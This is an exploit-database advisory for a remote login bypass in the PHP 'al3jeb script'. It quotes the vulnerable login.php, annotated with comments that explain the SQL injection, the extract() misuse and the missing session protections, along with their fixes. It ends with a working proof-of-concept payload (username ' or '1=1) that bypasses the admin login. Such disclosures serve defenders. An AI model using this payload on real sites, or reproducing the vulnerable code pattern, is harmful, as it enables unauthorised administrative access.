al3jeb script - Remote Authentication Bypass

EDB-ID:

11198

CVE:

N/A

Author:

cr4wl3r

Type:

webapps

Platform:

PHP

Published:

2010-01-19

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |      al3jeb script Remote Login Bypass Exploit     |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Date: 19.01.2010
[!] Remote: yes

[!] Vulnerable code [login.php]:

<?
// Short open tag: this block is only parsed as PHP when short_open_tag is enabled.
session_start();
// Each extract() call copies every key of the given array into the current
// symbol table. With the default EXTR_OVERWRITE behaviour an existing variable
// of the same name is replaced, so any request parameter can create or
// overwrite a script variable (register_globals re-created by hand).
// Order matters: later calls win, so a client-supplied cookie overrides the
// server-side session value of the same name.
// Safer: remove these calls and read only the specific keys the script needs
// from the specific superglobal they are expected in.
extract($_POST); 
extract($_GET); 
extract($_SESSION); 
extract($_COOKIE);
?>
<?php
// Admin login handler. Weaknesses visible in this listing: the SQL statement is
// built from raw POST input, the password is compared as submitted, and the
// session ID is not rotated when the session becomes authenticated.
include("Connections/config.php");
if(isset($_POST['Submit']))
{
 // Raw request values: no validation, length limit or escaping is applied.
 $u=$_POST["uname"];
 $p=$_POST["pwd"];
 // Root cause of the bypass: both values are interpolated inside single-quoted
 // SQL string literals, so a quote character in either field changes the
 // structure of the WHERE clause instead of being treated as data.
 // magic_quotes_gpc (the precondition named in the advisory banner) used to
 // backslash-escape quotes in request data; it was removed in PHP 5.4 and was
 // never a reliable defence.
 // Fix: use a prepared statement with bound parameters (PDO or mysqli). The
 // mysql_* extension used here was removed in PHP 7.0.
 // AdminPass is matched against the submitted password inside the query, so
 // the stored value is presumably not a salted hash (confirm against the
 // schema); store password_hash() output and check it with password_verify().
 $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");
 
// Any returned row counts as a successful login; the row's contents are never
// inspected. If the query fails, $r is false and this call only raises a warning.
if($row=mysql_fetch_array($r))
{
 // The session stores the submitted string, not the AdminName column of the
 // matched row. session_regenerate_id() is not called before the session is
 // marked as authenticated, which leaves it open to session fixation.
 $_SESSION['AdminName']=$u;
 // $re is never assigned in this block; it can only be defined by the extract()
 // calls at the top of the file (presumably a "remember me" field; confirm).
 if(isset($re))
 {
 // The cookie carries the raw username with no integrity protection and
 // without the HttpOnly/Secure flags.
 // NOTE(review): whether other pages treat this cookie as proof of login is
 // not visible here; confirm.
 setcookie("username",$u,time()+3600);
 }
 // No exit follows the redirect, so the script keeps running after this header.
 header("location:index.php");
 
}
// A failed login falls through silently: this block shows no error message,
// logging or attempt throttling.
}
?>


[!] PoC: [al3jebscript]/login.php

    username : ' or '1=1
    password : cr4wl3r